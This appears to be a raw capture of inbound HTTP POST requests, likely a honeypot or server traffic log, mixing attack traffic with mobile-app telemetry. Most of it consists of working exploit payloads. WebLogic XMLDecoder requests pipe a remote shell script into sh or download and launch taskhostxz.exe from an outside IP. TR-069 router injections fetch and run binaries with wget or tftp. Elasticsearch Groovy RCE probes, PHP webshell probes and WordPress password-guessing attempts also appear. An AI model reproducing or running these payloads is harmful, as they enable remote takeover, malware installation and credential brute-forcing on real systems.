<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
axa=die('Hello, Peppa!'.(string)(111111111*9));
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://cm.gcm.ksmobile.com/rpc/gcm/report HTTP/1.1
Charset: UTF-8
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: cm.gcm.ksmobile.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 428
appflag=khcleanmaster&phonelanguage=in_ID&cmlanguage=in_ID&mcc=510&mnc=10&apkversion=5.14.2.4845&dataversion=2016.7.18.1648&sdkversion=4.4.4&manufacture=Xiaomi&channel=2010002546&trdmarket=1&cl=ID_in&aid=6ccc52a8048214f&timezone=Asia/Jakarta&country=ID&enabled=1&regid=APA91bGWRkNgry8cYyTFS3g5eIn45GwRPU2cMOutNLOJrtD0cDMgD-8kcgnif0oOZW-t9q0dLL3vE7GzHPq5J5vYHNKaQ67rDQ7Lzjmi1JJq5ZsNLMAOa-qBawNqE96V5Lk29ZQUmowh&regtime=1493631697
POST http://check.proxyradar.com/azenv.php?auth=152931069039&a=PSCMN&i=3489034269&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 432
Cache-Control: no-cache
E/QPyNrBbBp3QvrgAZuOnhadc1Izn+ru31TLLgkc3qozNi0dkxR+Q9UibdY2K9jig6S43DzAXXYl0HtybtrzZmghDYf5gVpQ3n/IcjJdntAhP9DC52ynvIfMGX0I4lRkuLtFLzPCoi4t6lQF9q3UTP4ZrxwG48kSMT1zF0G3tb4oMMdVL51d0JFoynS3l841AMvBbzVc1C5jcq1/jNW/90XPtFqtjEgh+KYv004/WDdRFEb3ycaJ7yXO9LsXOsZmxxDg/dK8G9vy9+GoBOBrgveRJ6jTOKrlrqnxQsbUosra8uhHA2QVN26aDaFo7hFRtVh8dAIKb8eY6Lml2jxxkEUn5rHYUNqCuXZFJaoe6z2zIk/ZEOF6va8lxD7V6ZXlLQLXw73NARSHW/BD3X7jdWYmxKWZfcmXn2IWotB3pIOMvPtT
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache
R6VZlIiZNpe+i4WDjFd05FDNqcGm2p1lV4B9ypQahhnKEbHIcd3QQbKXwiZcyjisZG9W6qaYuRZKewkXdrgyfhhOHYO17TALNcuAlQzUyY31QpRpaud+4iUe2Rv0oFwo/Y+owp/c3LoKMpYChmNoahTMhoLxHZbqb/fkXmgFm75vOFbq1NIeY28jSBekAYn5vt6oORI5aGNzJ/3mHkb+KZktpz2cBBr8W7LKQjKpsoHnSzKALC/8cUXQhzobJClsYuCmxpFRDn5hmE6DE7EM9h+F8jWaqHsK4Jhhqpw4r2/SENBhMRU5W7RA13uJ6aOw4UG8W1zg2Xw6WVLCaxYt0PqypSiqgtmw2cuGVzt953EaNbrS
POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked
3f9
òã…Ω¢w€|`9dAVp
Mo)M\WRexTP$fnax]Huíbu(
aJL Zgj-: wR"5=dWHmS?\VMZ+jOXV[a~rTL[Z>'B6=[S TDBC
rAYQ^{k[jW[SAoy@\W\gg^VMZ>jONQ b|NbBZWjpD W2-TfQ]M9yDUAFu9
rV_S<|X2*hB[OlyGeWgBZ2jOUOH!k
`Q]PHmdW
HmkK]=

2!B9-A\7JLZgyC_S^ne
ArW_TJdzDYS^ay
dRVYT+WVASc+N 4T
VNd)B _f|6ET[XnzFYWH{kXj[M>}SX4( 3^ZM9pM]UZ2{MQbDM'WVRY{k^jU_XJi{YNus
Q?IH2'[ >%M3H  s)>-_1M
LMZ(jOXV_g{rWDTPIhzL^R_g}fRYU@edWAPuxQaS]TId.GYY1(Pa@VPN?z [Sdk \LTNhyA\UYny iVWXjzL\5q6E_[Cq3WAPfx&\ZPKdzF^[_{kX\rD
s/2gI\4V V<8M;<[|L[Lh|F]WFu:
aS\XJl}EXUZaqd^BCrWUW1pLb@QXXj-YR_bNSb_
RJn}ANOH'ke_V9- 1*TiFSPd}_ZR4~
rYJCrD@Ausb^^R@qjAPu*G_~C 8f8 L7ILMZ(jO]Q^bq|L[Il}GUQ[by`^ZV@mpYNHmk2B_
VJ9CU]2(ePJhq_QYb}
rTDTCj)_WRexTe@SXWd-ARayNgT^XZ dN HmxrRDTTNnyFTVY{kX\rD
s.8&C<M CT=WVWXb{#\_PMoqG]VZchQZY@qjNYH`~3@UXTA;)@
PS3+MVe[A9
29f
yF\R ue
BrDTAe-D_UZ4pPeESIk}FZYgzKT6TLT&jNYR{k^jV_SJozD@A9k3K @>- y&ZQ1JLZgqM^R_{k[jW[SAoy@\W\gg^VMZ>jONT]exKVcSWh.FU2-1WInxD
AFu9
rFVQ8+DS6{JcG_
RAd,\\g{
aBZ2jO^OH!khRBC3jON:gJP=JLZgpF@Ause_\PMm|C\URc~
hD
CB+C[P o(T`WT9+@SYa,M`R_8jYNHmk
fRd-U[^o*eRYWI?qC]U[1,
O|_DCBldWAPey`WXQHqjAPu*G_~IV<&>*[|L[HqjNY[f| bS^UNm~MXT^e}3\LRIdyMXZ\fz3 9zM  axPfS
CT8WVA_c-J
b^XLo|
apN6F_]TH;)ATH*eS?\VMZ+jO]SRgx`DZgjD4%MS>I/f % \KrDCBn}AUS_be
ArW_TJdzDYS^ay
dRVYT+WVAbx2T\Tk+ Y1/M
c_^L>GYQH{kXjV]@iy^ d-NW5VWH?-F\SSf*J
`D<
0
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 530
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;tftp -l 3 -r 1 -g l.ocalhost.host;chmod 777 3;./3`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache
AQrjzCZDVwp3sYodql7DMEk1jR13ruI78HZ4uK1CHM+USLesqh49X+mKiae4OnuUaKmzMl4xhraFgFYwuEPgvqTQvqAksaJE5Z2W4Vp5sIHU7AMe+RRPYJUvhwHRGxIb7SL9wombeYnQz9S/XR/5y3Zn1bNL3z42PN1FlMN9sd0vYeSlDsHLIezpENbr5w2htl5JO2zFDZIcdTxnSXX1GNsKxRO2eYCjRvJzGzT09Eqj4ilp3mW52YnC7LkRHe4x3ErGBhIXKWGMFl5Wdd6cnn7S97a7bBGpVPa01oeMr8nN4l1b/+dk0e4M1Puk3HosOJ/xPRKBscfyNWYYU8ZVqBHSWk90+JgCrPr7zmAKz+3yQJRWHpv8bwH0UxLKPWIm9BJORvKMYHweJwcI7u/708Dc1mI/8lWS+w0cVA==
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Ål÷yyÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îìD!Y›∆√«∆fl
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149602540431&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 34
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue321
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 32
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue9
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 519
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://tr069.pw/1;chmod 777 1;./1`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
‡rmqv
wf
C
POST /_search?pretty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
User-Agent: Java/1.8.0_31
Content-Length: 409
Host: x.x.x.x:9200
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://admaster.union.ucweb.com/usetting/v1/fetch_config HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Connection: keep-alive
Host: admaster.union.ucweb.com
Content-Type: application/json; charset=utf-8
Content-Length: 259
{"vno":"1495194020093","configs":[{"anchor":"0","name":"app_data"}],"app_id":"5e9abf4638d337bb55007d1fd4244486","chk":"0efb8a6c","info":{"sdk_ve":"3.0.10","pkg_ve":"10.9.0","pkg":"com.uc.browser.en","type":"1","device_hash":"af8795dc3d31775f","sdk_vc":"212"}}
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1072
Content-Type: multipart/form-data; boundary=nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
47785
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1a62aba177bcf4d483b4de94e2ead21a
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb--
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1025
Content-Type: multipart/form-data; boundary=g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
274376
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
f1785b92f1f119e5123ff476bb564f05
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI--
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 24
Cache-Control: no-cache
log=jamesatchue&pwd=aaaa
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
h=die((string)(111111111*9));
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
m=die('Hello, Peppa!'.(string)(111111111*9))
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 33
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue99
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache
SvFfld3LMAcb7s6eiGwhO95VJEm2TOGnKtnY6Sc3R6B+/rHlMsKqTXJ4u3VuVQq4HmGrPVLKOZZt8HXxG+E0k1qCf11BQITrQFHbpqACLe/14LHE9RViPGTl3Mky91WTUYH73hPD2yXVqvHZCMX9DGl9/003Qnc0yqklmSymx7WaPRqBwu5rJ1y5wrG2ON6X9SLN95KIXIonVSmLsizusdQetPRRMRRWK+IUmQtDcikVPvDxdD7PCVqzIgB63ndSkUJSjM6Nzsg2MTL84FN+8Z9L9YZwIl7RhGM+wu5zdgxjNnQhU/2Ms0O6jrp5MOw14IhC3PrjruUeQsI0TV9xwNcoPShrnPEkHR7vfq6bSlrOx/IR
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 412
Cache-Control: no-cache
S/Fcl9LKYA8DrdXmMonzIIz+2rxcpsS4LeIlWhtMsbG55xyC+UdTXqzJ7t8Mwg0IVCCezJzo3RnSpZwlyJkMiBtZ5uSH9kiYrWJL10yRUZgdeBOY56KfIteQbzC5BYw8ivTf6yCs8QM1XUE1T0xxUI4pPsb35USYfCvd2M3uLBj7gPhGiX5YSywDHhj2ulxzbpnMl0wba8bjuAox2CtjLq7vdsqPEhfpTRH+LjKrex1Xc6B+QxlJAxye5mgSCWrpX3wL29hEdRmLw783WzCsUwvN3XAIP0h+x3O4slB/Sl+17KLhNSsGiHTUXf4w3rKTSNh83kOrr41XBxiKWlnHlhTqrivt1enovBgPW5LaDmzoodSwGdJsuZL6XOhnTxHmWdw1KfpTtvu6xuYcfFSkrPJMWQ==
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
